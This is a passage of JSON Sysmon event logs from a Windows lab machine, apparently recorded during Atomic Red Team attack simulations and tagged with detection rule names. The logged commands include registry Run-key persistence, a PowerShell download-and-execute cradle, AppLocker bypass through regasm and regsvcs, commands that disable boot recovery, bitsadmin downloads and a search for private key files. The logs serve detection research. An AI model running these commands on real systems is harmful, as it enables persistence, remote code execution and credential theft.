14:45:06.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3600,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.075725Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ParentProcessId":3216,"ProcessGuid":"747F3D96-D772-5D31-0000-001010E82800","ProcessId":3772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.132"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3601,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.137175Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ProcessId":6472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3603,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.196458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ParentProcessId":6472,"ProcessGuid":"747F3D96-D772-5D31-0000-001083ED2800","ProcessId":6120,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3604,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.213488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`\")\"","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence - via Run 
key","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun","UtcTime":"2019-07-19 14:45:19.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3607,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:19.483250Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Startup Folder File Write"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-18 20:53:13.080","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk","UtcTime":"2019-07-19 14:45:31.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3609,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:31.287863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows 
Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ProcessId":5800,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3613,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.681219Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ParentProcessId":5800,"ProcessGuid":"747F3D96-D7A3-5D31-0000-0010D2B42900","ProcessId":6176,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.694"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3614,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.699293Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7BB-5D31-0000-0010D5092A00","ProcessId":1060,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:46:19.479"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3619,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:46:19.484316Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence or CredAccess - Lsa NotificationPackge","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages","UtcTime":"2019-07-19 
14:47:21.917"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3632,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:21.972037Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New DLL Added to AppInit_DLLs Registry Key"],"event":{"Event":{"EventData":{"Details":"C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D809-5D31-0000-00105C262B00","ProcessId":6056,"RuleName":"Persistence - AppInit","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs","UtcTime":"2019-07-19 14:47:37.136"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3635,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:37.147054Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001064AD2B00","ParentProcessId":6508,"ProcessGuid":"747F3D96-D817-5D31-0000-001097B02B00","ProcessId":396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.844"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3648,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:51.865963Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} recoveryenabled no","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} recoveryenabled no\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001049B42B00","ParentProcessId":6216,"ProcessGuid":"747F3D96-D817-5D31-0000-0010B7B62B00","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3650,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:52.010791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D824-5D31-0000-001023F42B00","ParentProcessId":6736,"ProcessGuid":"747F3D96-D824-5D31-0000-001075F62B00","ProcessId":1540,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:04.122"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3655,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:04.131410Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D83E-5D31-0000-0010A2D72E00","ParentProcessId":4036,"ProcessGuid":"747F3D96-D83E-5D31-0000-0010AAD92E00","ProcessId":3732,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:30.796"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3660,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:30.807486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ProcessId":888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3677,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.524876Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-001045922F00","ProcessId":6220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3678,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.557947Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"findstr /e .key","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Find String (QGREP) Utility","FileVersion":"10.0.17763.1 
